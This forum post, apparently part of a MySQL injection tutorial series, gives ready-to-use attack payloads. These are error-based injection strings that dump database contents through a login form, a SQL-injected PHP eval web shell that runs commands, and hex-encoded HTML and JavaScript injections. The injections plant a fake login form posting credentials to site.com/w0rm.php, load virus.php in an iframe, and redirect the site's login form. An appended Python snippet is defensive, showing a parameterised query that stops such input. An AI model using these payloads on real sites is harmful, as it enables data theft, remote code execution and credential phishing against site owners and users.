51Testing Software Testing Forum

Title: mysql injection 7

Author: 悠悠小仙仙    Time: 2019-2-1 16:03
#0x10 ~ Update
I am taking this opportunity to update this complete document.
#0x10.a ~ Advanced Login Bypass
I hope you enjoyed reading the "Bypassing Logins" chapter. Now it is time to learn how to dump the database behind a vulnerable login form.
select username,pass from users where username="$uname" and password="$passwrd" limit 0,1
select username,pass from users where username='$uname' and password='$passwrd' limit 0,1
Code:
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
username : " (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
Again, you can leave the password field blank. Now let's look at what the query receives.
select username,pass from users where username='' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='' and password='' limit 0,1

#0x10.b ~ RFI through SQL Injection
If you have read this far and understand RFI vulnerabilities, no explanation is needed. It's easy!
site.com/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');

#0x10.c ~ Phishing via URL Spoofing
This time the title says it: we will use a SQL injection vulnerability for phishing via URL spoofing. There are three methods.
We inject the payload through the SQL injection and add some extra code to the web page, just as in XSS.
First, injecting HTML. For simplicity we hex-encode the payload. For the payload:
<form action=http://site.com/w0rm.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>
Hex-encoded:
3c666f726d20616374696f6e3d687474703a2f2f736974652e636f6d2f7730726d2e706870206d65 74686f643d22504f5354223e0d0a557365726e616d65203a203c696e70757420747970653d227465 787422206e616d653d22757365726e616d65223e3c62723e0d0a50617373776f7264203a3c696e70 757420747970653d227465787422206e616d653d2270617373776f7264223e0d0a3c696e70757420 747970653d227375626d6974223e0d0a3c2f666f726d3e0d0a3c696672616d65206865696768743d 302077696474683d303e
Inject the hex (payload) into the injected SQL.
Injecting an iframe
For example:
<br><iframe src="http://site.com/virus.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>
Code:
3c62723e3c696672616d65207372633d22687474703a2f2f736974652e636f6d2f76697275732e70 687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022 207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5--
Code:
site.com/link.php?id=-1'+union+select+1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f736974652e6 36f6d2f76697275732e70687022206865696768743d3330302077696474683d333030206672616d6 5426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5--
Changing the current form
In this attack we inject JavaScript into the site that changes the action of the site's current login form to the link of our fake login page.
<script>document.getElementsByTagName("form")[0].action="http://www.site.com/virus.php"</script>
Code:
3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d65282266 6f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636f6d2f766972 75732e706870223c2f7363726970743e
Code:
site.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e6 16d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636 f6d2f76697275732e706870223c2f7363726970743e,4,5--
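The login query from 0x10.a next to the fix a defender applies, as an added example that is not part of the original post. It uses Python with an in-memory SQLite table in place of PHP/MySQL (same query shape, column named password throughout) and a simplified stand-in for the post's `' or (...) --` usernames; make_db, login_vulnerable, login_safe and compare are names chosen here.

```python
import sqlite3

# Constructed stand-in for the post's `users` table. SQLite instead of MySQL
# only so the example runs anywhere; the plaintext password column mirrors
# the post and is not good practice.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", "s3cret"), ("guest", "guest")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, uname: str, passwrd: str):
    # The post's query, built by splicing input into the SQL text. A quote in
    # uname closes the string literal and whatever follows is parsed as SQL.
    sql = (f"select username,password from users where username='{uname}' "
           f"and password='{passwrd}' limit 0,1")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, uname: str, passwrd: str):
    # Parameterised query: the statement is parsed first and the values are
    # bound afterwards, so the same input is only ever compared as a string.
    sql = ("select username,password from users where username=? "
           "and password=? limit 0,1")
    return conn.execute(sql, (uname, passwrd)).fetchone()


# Simplified form of the post's `' or (...) --` usernames: the quote ends the
# literal, `or 1=1` makes the WHERE clause true, `--` comments out the rest
# (including the password check).
PAYLOAD = "' or 1=1 --"


def compare(payload: str = PAYLOAD) -> dict:
    # Same payload and an empty password through both query styles, plus a
    # legitimate login through the safe one to show it still works.
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, payload, ""),
        "safe": login_safe(conn, payload, ""),
        "legit": login_safe(conn, "admin", "s3cret"),
    }


if __name__ == "__main__":
    for name, row in compare().items():
        print(f"{name:>10}: {row}")
```

The vulnerable function returns the first user row for the payload; the parameterised one returns nothing, because the payload was compared as a username rather than executed.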

Welcome to 51Testing Software Testing Forum (http://bbs.51testing.com/) Powered by Discuz! X3.2